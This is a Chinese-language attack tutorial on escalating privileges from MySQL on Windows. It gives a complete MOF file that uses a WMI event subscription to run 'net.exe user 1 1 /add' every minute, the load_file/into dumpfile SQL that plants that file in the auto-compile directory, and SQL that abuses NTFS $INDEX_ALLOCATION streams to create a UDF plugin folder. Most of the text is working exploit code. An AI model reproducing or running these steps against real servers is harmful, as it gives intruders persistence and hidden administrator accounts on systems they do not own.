一. MOF 提权（利用 %SystemRoot%\system32\wbem\mof 目录自动编译 MOF 的特性）

1、找一个 MySQL 服务进程可写的目录（例如 C:\wmpub），把下面的 mof 文件写进去。注意：wbem\mof 目录自动编译 MOF 的特性只在 Windows XP / Server 2003 及更早版本上存在，Vista 及之后的系统已移除，此方法在新系统上无效。

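// Permanent WMI event subscription: once a minute (when the local clock's
// Second == 5) the JScript consumer runs `net.exe user 1 1 /add`.
// The original listing lost its backslashes during extraction; MOF string
// literals need them doubled, and the quotes inside the JScript literal
// must be escaped, otherwise mofcomp rejects the file.
#pragma namespace("\\\\.\\root\\subscription")

// Filter: matches modification events of Win32_LocalTime in root\cimv2
// whose Second property equals 5.
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that launches net.exe through WScript.Shell.
// NOTE(review): the account/password "1"/"1" will be rejected on hosts with a
// password-complexity policy; the command is retried every minute regardless.
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user 1 1 /add\")";
};

// Binding: wires the filter to the consumer so the script runs on each match.
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};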

2、用 load_file() 配合 into dumpfile 把文件导出到 %SystemRoot%\system32\wbem\mof\ 目录。前提：当前 MySQL 账户具有 FILE 权限、secure_file_priv 未限制，且 MySQL 服务以 SYSTEM/管理员身份运行（否则写不进 system32）。系统会自动编译该目录下的 mof 文件，之后按过滤器条件周期性执行其中的命令。

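-- Copy the MOF written in step 1 into the WMI auto-compile directory.
-- Requires the FILE privilege, secure_file_priv unset (or covering both paths),
-- and the MySQL service running with write access to %SystemRoot%\system32\wbem\mof
-- (normally only LocalSystem/Administrators have it).
-- load_file() returns NULL if the source cannot be read; verify with
-- `select load_file('C:/wmpub/mysql.mof') is null;` before dumping.
select load_file('C:/wmpub/mysql.mof') into dumpfile 'c:/windows/system32/wbem/mof/mysql.mof';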

二. UDF 提权：Can't open shared library

某些情况下，我们会遇到 Can't open shared library 的报错。MySQL 5.1 及以上版本只允许从 plugin_dir（默认为 basedir\lib\plugin）加载 UDF，因此需要把 udf.dll 导出到该目录下才行；但默认安装下 plugin 目录并不存在，而 into dumpfile 本身无法创建目录。

大牛研究出了利用 NTFS ADS（备用数据流）创建文件夹的方法：向 `目录名::$INDEX_ALLOCATION` 这个流写入数据时，NTFS 会把对应目录创建出来。该技巧仅在 NTFS 卷上有效，同样需要 FILE 权限且 secure_file_priv 未限制。

 

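-- Locate the MySQL installation directory; plugin_dir defaults to <basedir>\lib\plugin.
select @@basedir;
-- Confirm where the server actually loads UDFs from before writing anything.
select @@plugin_dir;
-- Create the lib directory via its NTFS $INDEX_ALLOCATION stream. The original
-- listing lost its backslashes during extraction; inside a MySQL string literal
-- each backslash must be doubled.
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';
-- Create the plugin directory the same way (NTFS only; needs FILE privilege and
-- secure_file_priv unset). Afterwards dump udf.dll into this directory.
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';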